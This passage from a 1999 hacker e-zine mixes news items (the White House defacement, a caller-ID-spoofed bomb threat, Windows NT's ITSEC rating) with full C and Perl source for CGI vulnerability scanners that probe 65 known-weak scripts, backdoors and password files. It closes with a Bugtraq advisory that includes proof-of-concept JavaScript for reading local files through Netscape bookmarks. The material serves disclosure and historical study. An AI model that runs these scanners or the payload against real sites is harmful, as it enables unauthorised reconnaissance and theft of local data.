we�re pleased that the FBI is not treating this as a minor matter. It wasn�t an insignificant incident. It was a very concentrated, serious effort over a period of time. Burns was not charged in the attack on the White House computers.The opening page of the White House site was altered briefly to show a black Web page with the names of the hacker organizations claiming responsibility, along with messages, Your box was own3d and Stop all the war. The page also included the phrase, following peeps get some shouts, and listed a dozen names, including Zyklon. @HWA 11.0 IRC war and a Police HQ bomb threat send two headed for trouble.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ CallerID Fooled In Omaha contributed by hantai A bomb threat was called in to the Omaha police headquarters recently. The Police responded to the address reported by CallerID. While the police where at that address another bomb threat was called in from the same number. US West says that there are some "technical pieces of equipment" the criminals could use to make a phone call appear to come from someones number without actually being at that phone. (Yeah, it's called a butt set and telephone can on a street corner, real technical. Oh, and most of those cans aren't even locked) HNN has received reports that the perpetrators of this prank are known as 'port' and 'rottenboy' on IRC and did this in retaliation for not being opped on an IRC channel. Omaha NBC Affiliate Channel 6 http://www.discoveromaha.com/partners/wowt/news/1999/05/phone_threat_14.html Police investigate mystery A threatening phone call has led police to a mystery and so far the clues have turned up nothing more than dead ends. The call was made to Omaha police headquarters Thursday night: a bomb threat. With caller I-D on police phones, the name and address of the alleged caller was quickly discovered Police made their way to a northwest Omaha home. Officer Don Savage says, "When they arrived,there they met a young man who said he had a feeling that the police would be coming to his house that night." The young man had received an anonymous message on his computer telling him to expect a visit from the police. While investigators were questioning the young man at his home, another call came in at police headquarters from the same number and address. Savage says, "911 contacted the sergeant on the scene at this house and asked 'is this the house?' And the sergeant confirmed no one had made a phone call from that house. Carla Ewert with U.S. West says, "There are some technical pieces of equipment that are available if someone's going to use the phone lines dishonestly. And they technically could tap into someone's phone line from outside the house, never have to be in the person's home." Ewart says it's virtually impossible for someone to use their computer to call in a threat from someone else's phone line. She says the connection between voice and data are separated. Right now police aren't sure what the computer connection is, or how the scheme was carried out. But a threat to their own house won't go unpunished. Channel six news talked to the family who's phone line has been used in this scheme. They are also baffled as to how their phone line was tapped. Police say they intend to stay on the case until an arrest is made. @HWA 12.0 UK Labels Windows as 'secure' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ UK Labels Windows as Secure contributed by toka25 The U.K. Information Technology Security Evaluation Criteria (ITSEC), must have been hit on the head, dropped at birth, or be taking some really good drugs. Why? They have awarded Windows NT Server 4.0 and Windows NT Workstation 4.0 an E3/FC-2 rating. Microsoft says that this is "the highest security evaluation possible for a general-purpose operating system". Either this is all Microsoft spin or the testers have never heard about things like pwdump or L0phtCrack. Microsoft Propaganda http://www.microsoft.com/windows/dailynews/042999.htm April 29, 1999 U.K. government evaluation confirms security of Microsoft Windows NT 4.0 platform Windows NT platform receives high security evaluation London�The British government this week concluded that the Microsoft� Windows NT� platform passes muster when it comes to security. After more than a year of intensive testing, the U.K. Information Technology Security Evaluation Criteria (ITSEC) certification board has awarded Windows NT Server 4.0 and Windows NT Workstation 4.0 an E3/FC-2 rating�generally acknowledged as the highest security evaluation possible for a general-purpose operating system. The security standards agency evaluation included examinations of the source code and design documentation of Windows NT 4.0 with Service Pack 3. Testers also had direct access to the engineers who designed and tested the server operating system. Their conclusion: the Windows NT 4.0 architecture provides robust but flexible security. "The successful ITSEC evaluation confirms the robust security and design of Windows NT," said Edmund Muth, group product manager at Microsoft. "The strong security and wide range of security-related features in Windows NT benefit customers�both those in industries where security is a paramount concern, like banking, government, healthcare and the military�and individuals who are concerned about their privacy and e-commerce." The comprehensive security architecture in the Windows NT platform provides that level of safety. Its integrated security features include strong authentication, fine-grained access control, real-world auditing tools and secure communications. Governments and enterprises around the world have already put those features to use. Last Fall, Brazil used a Windows NT-based network to securely host the largest electronic elections in history. Requiring the highest level of security, nearly 90 percent of NATO's headquarters and field sites in Europe and the United States use a Windows NT-based system to deliver tactical data and military messaging. And in the private sector, one of New Zealand's largest banks counts on Windows NT to provide secure banking over the Internet. The ITSEC rating provides independent confirmation of the platform's security features. ITSEC is the only evaluation scheme recognized by the British government for use in secure and sensitive installations. It is also officially recognized by the governments of many European Union countries, Canada, the former Soviet republics and, with slight variations, in New Zealand and Australia. The E3/F-C2 evaluation is roughly equivalent to a C2 evaluation under the U.S. Trusted Computer Security Evaluation Criteria (TCSEC) regime, better known as the "Orange Book." Microsoft is separately pursuing a C2 evaluation for Windows NT 4.0, which is expected to be completed shortly. But security isn't the only thing this platform offers. The multipurpose server operating system that forms the foundation of the BackOffice� family, Windows NT Server 4.0 offers a comprehensive set of services. From communications and file and print services to a platform for building and hosting Web- and client-server-based applications, Windows NT Server is built to meet the many needs of business. Windows NT Workstation 4.0, developed specifically for the business environment, makes it easy to use, manage and integrate those features. The operating system gives employees the intuitive look and feel of Windows� 98, so companies can cut training costs, and people can work productively right from the start. The Windows NT platform is also the quickest path to Windows 2000, which is designed to be Microsoft's most robust and reliable operating system to date. Windows 2000 is also designed with security in mind. Microsoft is taking orders for the Beta 3 versions of Windows 2000 Server and Workstation. After Microsoft releases Windows 2000, the company plans to submit the operating system for a similar security evaluation under the Common Criteria, a new evaluation system that will consolidate the TCSEC and ITSEC criteria. The results of which could further the Windows platform's reputation of providing secure computing. @HWA 13.0 Yugoslavia to stay plugged in ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Yugoslavia to Stay Online contributed by Code Kid After all the confusion of whether companies should or should not pull the plug on Yugoslavia the Clinton administration has promised not to unplug the region from the rest of the net. Wired http://http://www.wired.com/news/news/politics/story/19697.html 14.0 VISA Releases Draft Protection Profile ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Kingpin According to Schneier's Crypto-Gram Visa has issued a draft of the "Visa Smart Card Protection Profile," as part of the Common Criteria. It contains a very nice list of smart card attacks. The document is a draft, and they want comments. Visa Smart Card Protection Profile http://www.visa.com/nt/chip/accept.html (you must agree to a disclaimer before being allowed to dl this pdf document) The Visa document references the Common Criteria: Common Criteria http://csrc.ncsl.nist.gov/cc/ 15.0 cgichk v1.35 by su1d sh3ll now scans for 65 vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* ---------------------------------------------------------------------- */ /* CGI scanner v1.35, m0dify and recode by su1d sh3ll //UnlG 1999 */ /* Tested on Slackware linux with kernel 2.0.35;RH 5.2(2.0.36); */ /* FreeBSD 2.2.2-3.1;IRIX 5.3 */ /* Source c0de by [CKS & Fdisk] */ /* gr33tz to: Packet St0rm and Ken, ADM crew, ech0 security and CKS, ch4x,*/ /* el8.org users, #c0de, rain.forest.puppy/[WT], MnemoniX , */ /* hypoclear of lUSt,codex ;-) , K.A.L.U.G. */ /* fuck to: www.hackzone.ru , HDT... CHC fuck u 2 , llamaz */ /* NATO and bill klinton <---- double fuck! :-) huh */ /* c0ming s00n: add-on for CGI scanner - for scan "C" class subnet & logs */ /* -----------------------------------------------[10:01 17.05.99 UnlG]- */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include void main(int argc, char *argv[]) { int sock,debugm=0; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; unsigned long start; unsigned long end; unsigned long counter; char foundmsg[] = "200"; char *cgistr; char buffer[1024]; int count=0; int numin,suxes=0; char cgibuff[1024]; char *buff[100]; /* Don't u think 100 is enought? ;-)*/ char *cginame[100]; /* Don't u think 100 is enought? */ buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n"; /* v0rt-fu when u modify source, check this first line.... that's my 8-) */ buff[2] = "GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n"; buff[3] = "GET /cgi-bin/phf HTTP/1.0\n\n"; buff[4] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n"; buff[5] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n"; buff[6] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n"; buff[7] = "GET /cgi-bin/nph-publish HTTP/1.0\n\n"; buff[8] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n"; buff[9] = "GET /cgi-bin/handler HTTP/1.0\n\n"; buff[10] = "GET /cgi-bin/webgais HTTP/1.0\n\n"; buff[11] = "GET /cgi-bin/websendmail HTTP/1.0\n\n"; buff[12] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n"; buff[13] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n"; buff[14] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n"; buff[15] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n"; buff[16] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n"; buff[17] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n"; buff[18] = "GET /cgi-bin/www-sql HTTP/1.0\n\n"; buff[19] = "GET /cgi-bin/view-source HTTP/1.0\n\n"; buff[20] = "GET /cgi-bin/campas HTTP/1.0\n\n"; buff[21] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n"; buff[22] = "GET /cgi-bin/glimpse HTTP/1.0\n\n"; buff[23] = "GET /cgi-bin/man.sh HTTP/1.0\n\n"; buff[24] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n"; buff[25] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n"; buff[26] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n"; buff[27] = "GET /cgi-bin/jj HTTP/1.0\n\n"; buff[28] = "GET /cgi-bin/info2www HTTP/1.0\n\n"; buff[29] = "GET /cgi-bin/files.pl HTTP/1.0\n\n"; buff[30] = "GET /cgi-bin/finger HTTP/1.0\n\n"; buff[31] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n"; buff[32] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n"; buff[33] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n"; buff[34] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n"; buff[35] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n"; buff[36] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n"; buff[37] = "GET /cgi-bin/wrap HTTP/1.0\n\n"; buff[38] = "GET /cgi-bin/cgiwrap HTTP/1.0\n\n"; buff[39] = "GET /cgi-bin/guestbook.cgi HTTP/1.0\n\n"; buff[40] = "GET /cgi-bin/edit.pl HTTP/1.0\n\n"; buff[41] = "GET /cgi-bin/perlshop.cgi HTTP/1.0\n\n"; buff[42] = "GET /_vti_inf.html HTTP/1.0\n\n"; buff[43] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n"; buff[44] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n"; buff[45] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n"; buff[46] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n"; buff[47] = "GET /_vti_bin/shtml.dll HTTP/1.0\n\n"; buff[48] = "GET /_vti_bin/shtml.exe HTTP/1.0\n\n"; buff[49] = "GET /cgi-dos/args.bat HTTP/1.0\n\n"; buff[50] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n"; buff[51] = "GET /cgi-bin/rguest.exe HTTP/1.0\n\n"; buff[52] = "GET /cgi-bin/wguest.exe HTTP/1.0\n\n"; buff[53] = "GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n"; buff[54] = "GET /scripts/CGImail.exe HTTP/1.0\n\n"; buff[55] = "GET /scripts/tools/newdsn.exe HTTP/1.0\n\n"; buff[56] = "GET /scripts/fpcount.exe HTTP/1.0\n\n"; buff[57] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n"; buff[58] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n"; buff[59] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n"; buff[60] = "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n"; buff[61] = "GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n"; buff[62] = "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n"; buff[63] = "GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n"; buff[64] = "GET /search97.vts HTTP/1.0\n\n"; buff[65] = "GET /carbo.dll HTTP/1.0\n\n"; /* we have at archive about 70 CGi , rule? ;-) */ cginame[1] = "UnlG - backd00r "; cginame[2] = "THC - backd00r "; cginame[3] = "phf..classic :) "; cginame[4] = "Count.cgi "; cginame[5] = "test-cgi "; cginame[6] = "nph-test-cgi "; cginame[7] = "nph-publish "; cginame[8] = "php.cgi "; cginame[9] = "handler "; cginame[10] = "webgais "; cginame[11] = "websendmail "; cginame[12] = "webdist.cgi "; cginame[13] = "faxsurvey "; cginame[14] = "htmlscript "; cginame[15] = "pfdisplay "; cginame[16] = "perl.exe "; cginame[17] = "wwwboard.pl "; cginame[18] = "www-sql "; cginame[19] = "view-source "; cginame[20] = "campas "; cginame[21] = "aglimpse "; cginame[22] = "glimpse "; cginame[23] = "man.sh "; cginame[24] = "AT-admin.cgi "; cginame[25] = "filemail.pl "; cginame[26] = "maillist.pl "; cginame[27] = "jj "; cginame[28] = "info2www "; cginame[29] = "files.pl "; cginame[30] = "finger "; cginame[31] = "bnbform.cgi "; cginame[32] = "survey.cgi "; cginame[33] = "AnyForm2 "; cginame[34] = "textcounter.pl "; cginame[35] = "classifields.cgi"; cginame[36] = "environ.cgi "; cginame[37] = "wrap "; cginame[38] = "cgiwrap "; cginame[39] = "guestbook.cgi "; cginame[40] = "edit.pl "; cginame[41] = "perlshop.cgi "; cginame[42] = "_vti_inf.html "; cginame[43] = "service.pwd "; cginame[44] = "users.pwd "; cginame[45] = "authors.pwd "; cginame[46] = "administrators "; cginame[47] = "shtml.dll "; cginame[48] = "shtml.exe "; cginame[49] = "args.bat "; cginame[50] = "uploader.exe "; cginame[51] = "rguest.exe "; cginame[52] = "wguest.exe "; cginame[53] = "bdir - samples "; cginame[54] = "CGImail.exe "; cginame[55] = "newdsn.exe "; cginame[56] = "fpcount.exe "; cginame[57] = "openfile.cfm "; cginame[58] = "exprcalc.cfm "; cginame[59] = "dispopenedfile "; cginame[60] = "sendmail.cfm "; cginame[61] = "codebrws.asp "; cginame[62] = "codebrws.asp 2 "; cginame[63] = "showcode.asp "; cginame[64] = "search97.vts "; cginame[65] = "carbo.dll "; if (argc<2) { printf("\n [-- CGI Checker 1.35. Modified by su1d sh3ll //UnlG --]"); printf("\nusage : %s host ",argv[0]); printf("\n Or : %s host -d for debug mode\n\n",argv[0]); exit(0); } if (argc>2) { if(strstr("-d",argv[2])) { debugm=1; } } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } printf("\n\n\t [CKS & Fdisk]'s CGI Checker - modify by su1d sh3ll //UnlG\n\n\n"); start=inet_addr(argv[1]); counter=ntohl(start); sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); /* <--- if u want scan another port change it */ /* codex when u again change this code pls call proggi like this 1.35.1 or 1.35.[a..z] ;-) */ if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("\n\n\t [ Press any key to check out the httpd version...... ]\n"); getchar(); /* CKS sorry, but ur new piece of code don't work :-( */ send(sock, "HEAD / HTTP/1.0\n\n",17,0); recv(sock, buffer, sizeof(buffer),0); printf("%s",buffer); close(sock); printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n"); getchar(); while(count++ < 65) /* huh! 65 cgi..... no secur1ty in th1s w0rld ;-)*/ { sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("Searching for %s : ",cginame[count]); for(numin=0;numin < 1024;numin++) { cgibuff[numin] = '\0'; } send(sock, buff[count],strlen(buff[count]),0); recv(sock, cgibuff, sizeof(cgibuff),0); cgistr = strstr(cgibuff,foundmsg); if( cgistr != NULL) { printf("Found !! ;)\n");++suxes; } else printf("Not Found\n"); if(debugm==1) { printf("\n\n ------------------------\n %s \n ------------------------\n",cgibuff); printf("Press any key to continue....\n"); getchar(); } close(sock); } if (suxes){ printf("...have a nice hack... ;-)\n");} else {printf ("...n0thing wr0ng on server..... hmm...sucks!\n");} } @HWA 15.1 cgichk.pl PERL version of the above cgi scanner from Wiltered Fire ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl ############################################## # # # CGI scanner in perl # # Written By: Epicurus (epicurus@wilter.com) # # # # Based on a C version by su1d sh3ll # # # ############################################## use Socket; @cgi_scripts = ("GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n","GET /cgi-bin/phf HTTP/1.0\n\n", "GET /cgi-bin/Count.cgi HTTP/1.0\n\n","GET /cgi-bin/test-cgi HTTP/1.0\n\n", "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n","GET /cgi-bin/nph-publish HTTP/1.0\n\n", "GET /cgi-bin/php.cgi HTTP/1.0\n\n","GET /cgi-bin/handler HTTP/1.0\n\n", "GET /cgi-bin/webgais HTTP/1.0\n\n","GET /cgi-bin/websendmail HTTP/1.0\n\n", "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n","GET /cgi-bin/faxsurvey HTTP/1.0\n\n", "GET /cgi-bin/htmlscript HTTP/1.0\n\n","GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n", "GET /cgi-bin/perl.exe HTTP/1.0\n\n","GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n", "GET /cgi-bin/www-sql HTTP/1.0\n\n","GET /cgi-bin/view-source HTTP/1.0\n\n", "GET /cgi-bin/campas HTTP/1.0\n\n","GET /cgi-bin/aglimpse HTTP/1.0\n\n", "GET /cgi-bin/glimpse HTTP/1.0\n\n","GET /cgi-bin/man.sh HTTP/1.0\n\n", "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n","GET /cgi-bin/filemail.pl HTTP/1.0\n\n", "GET /cgi-bin/maillist.pl HTTP/1.0\n\n","GET /cgi-bin/jj HTTP/1.0\n\n", "GET /cgi-bin/info2www HTTP/1.0\n\n","GET /cgi-bin/files.pl HTTP/1.0\n\n", "GET /cgi-bin/finger HTTP/1.0\n\n","GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n", "GET /cgi-bin/survey.cgi HTTP/1.0\n\n","GET /cgi-bin/AnyForm2 HTTP/1.0\n\n", "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n","GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n", "GET /cgi-bin/environ.cgi HTTP/1.0\n\n","GET /cgi-bin/wrap HTTP/1.0\n\n", "GET /cgi-bin/cgiwrap HTTP/1.0\n\n","GET /cgi-bin/guestbook.cgi HTTP/1.0\n\n", "GET /cgi-bin/edit.pl HTTP/1.0\n\n","GET /cgi-bin/perlshop.cgi HTTP/1.0\n\n", "GET /_vti_inf.html HTTP/1.0\n\n","GET /_vti_pvt/service.pwd HTTP/1.0\n\n", "GET /_vti_pvt/users.pwd HTTP/1.0\n\n","GET /_vti_pvt/authors.pwd HTTP/1.0\n\n", "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n","GET /_vti_bin/shtml.dll HTTP/1.0\n\n", "GET /_vti_bin/shtml.exe HTTP/1.0\n\n","GET /cgi-dos/args.bat HTTP/1.0\n\n", "GET /cgi-win/uploader.exe HTTP/1.0\n\n","GET /cgi-bin/rguest.exe HTTP/1.0\n\n", "GET /cgi-bin/wguest.exe HTTP/1.0\n\n","GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n", "GET /scripts/CGImail.exe HTTP/1.0\n\n","GET /scripts/tools/newdsn.exe HTTP/1.0\n\n", "GET /scripts/fpcount.exe HTTP/1.0\n\n","GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n", "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n","GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n", "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n","GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n", "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n","GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n", "GET /search97.vts HTTP/1.0\n\n","GET /carbo.dll HTTP/1.0\n\n"); @cgi_names = ("THC - backdoor ","phf ","Count.cgi ","test-cgi ","nph-test-cgi ", "nph-publish ","php.cgi ","handler ","webgais ","websendmail ", "webdist.cgi ","faxsurvey ","htmlscript ","pfdisplay ","perl.exe ", "wwwboard.pl ","www-sql ","view-source ","campas ","aglimpse ", "glimpse ","man.sh ","AT-admin.cgi ","filemail.pl ","maillist.pl ", "jj ","info2www ","files.pl ","finger ","bnbform.cgi ", "survey.cgi ","AnyForm2 ","textcounter.pl ","classifields.cgi","environ.cgi ", "wrap ","cgiwrap ","guestbook.cgi ","edit.pl ","perlshop.cgi ", "_vti_inf.html ","service.pwd ","users.pwd ","authors.pwd ","administrators ", "shtml.dll ","shtml.exe ","args.bat ","uploader.exe ","rguest.exe ", "wguest.exe ","bdir - samples ","CGImail.exe ","newdsn.exe ","fpcount.exe ", "openfile.cfm ","exprcalc.cfm ","dispopenedfile ","sendmail.cfm ","codebrws.asp ", "codebrws.asp 2 ","showcode.asp ","search97.vts ","carbo.dll "); print "CGI scanner [in Perl] v1.0\n\n"; print "Host: "; chomp($remote=); print "HTTP Port [80]: "; chomp($port=); if($port eq "") { $port=80; } print "Log Session?(y/n)"; $yn=; if($yn =~ /y/i) { $log = 1; $logfile="$remote".".scan"; print "Log File [$logfile]: "; $file=; chop($file) if $file =~ /\n$/; if($file ne "") { $logfile=$file; } open(LOG,">>$logfile") || die("Unable to write to $logfile!"); print LOG "Scanning $remote port $port\n\n"; } print "Press [enter] to check the httpd version...\n"; $blah=; $submit = "HEAD / HTTP/1.0\r\n\r\n"; if($port =~ /\D/) { $port = getservbyname($port, 'tcp') } &error("No port specified.") unless $port; $iaddr = inet_aton($remote) || &error("Failed to find host: $remote"); $paddr = sockaddr_in($port, $iaddr) || &error("Some fucking thing!"); $proto = getprotobyname('tcp') || &error("Unable to get protocall!"); socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!"); connect(SOCK, $paddr) || &error("Unable to connect: $!"); send(SOCK,$submit,0); while() { print $_; print LOG $_ if $log==1; } close(SOCK); print "Press [enter] to check for CGI vulnerabilities...\n"; $blah=; $i=0; foreach $cgi_script(@cgi_scripts) { print "Searching for @cgi_names[$i] : "; print LOG "Searching for @cgi_names[$i] : " if $log==1; $submit=$cgi_script; &connect_n_check; $i++; } if($bad_security>0) { print "Server may have CGI vulnerabilities.\n"; print LOG "Server may have CGI vulnerabilities.\n\n" if $log==1; } else { print "No known CGI vulnerabilities found.\n"; print LOG "No known CGI vulnerabilities found.\n\n" if $log==1; } close(LOG) if $log==1; exit; sub connect_n_check { if($port =~ /\D/) { $port = getservbyname($port, 'tcp') } &error("No port specified.") unless $port; $iaddr = inet_aton($remote) || &error("Failed to find host: $remote"); $paddr = sockaddr_in($port, $iaddr) || &error("Some fucking thing!"); $proto = getprotobyname('tcp') || &error("Unable to get protocall!"); socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!"); connect(SOCK, $paddr) || &error("Unable to connect: $!"); send(SOCK,$submit,0); $check=; ($http,$code,$blah) = split(/ /,$check); if($code == 200) { print "Found!\n"; print LOG "Found!\n" if $log==1; $bad_security++; } else { print "Not Found\n"; print LOG "Not Found\n" if $log==1; } close(SOCK); } sub error { $error = shift(@_); print "Error - $error\n"; print LOG "Error - $error\n\n" if $log==1; close(LOG) if $log==1; exit; } @HWA 16.0 Vulnerability in Netscape bookmarks found by George Guninski... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Sun, 16 May 1999 17:17:34 +0300 From: Georgi Guninski To: BUGTRAQ@netspace.org Subject: Netscape Communicator bookmarks security vulnerability There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they handle special bookmarks with JavaScript code in the title. If you enclose a JavaScript code with <SCRIPT> tags in the <TITLE> tag and bookmark that page, the JavaScript code is written in the local bookmarks file. Then when the bookmarks file is open, the JavaScript code is executed in the security context of a local file - the bookmarks file. The bookmarks file may be open by a script, probably a server redirect or by the user. The bookmarks file name must be known, but it is easily guessed for most dialup users. Vulnerabilities: reading user's bookmarks, browsing local directories, reading local files (works fine on Linux, probably possible on Windows). Workaround: Disable JavaScript or do not bookmark untrusted pages. Demonstration is available at: http://www.nat.bg/~joro/book2.html See attached file for the source. Georgi Guninski http://www.nat.bg/~joro http://www.whitehats.com/guninski -------------------------------------------------------------------------- <http://www.nat.bg/~joro/book2.html> <HTML><HEAD> <TITLE> <SCRIPT> alert('Bookmarks got control'); s='Here are some bookmarks: \n'; for(i=1;i<7;i++) s += document.links[i]+'\n'; alert(s); dirToRead='wysiwyg://2/file://c:/'; a=window.open(dirToRead); s='Here are some files in C:\\ :\n'; for(i=1;i<7;i++) s += a.document.links[i]+'\n'; a.close(); alert(s); </SCRIPT> There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they handle special bookmarks with Javascript code in the title.
If you enclose a JavaScript code with <SCRIPT> tags in the <TITLE> tag and bookmark that page, the JavaScript code is written in the local bookmarks file. Then when the bookmarks file is open, the JavaScript code is executed in the security context of a local file. The bookmarks file may be open by a script, probably a server redirect or by the user. The bookmarks file name must be known - easily guessed for most dialup users.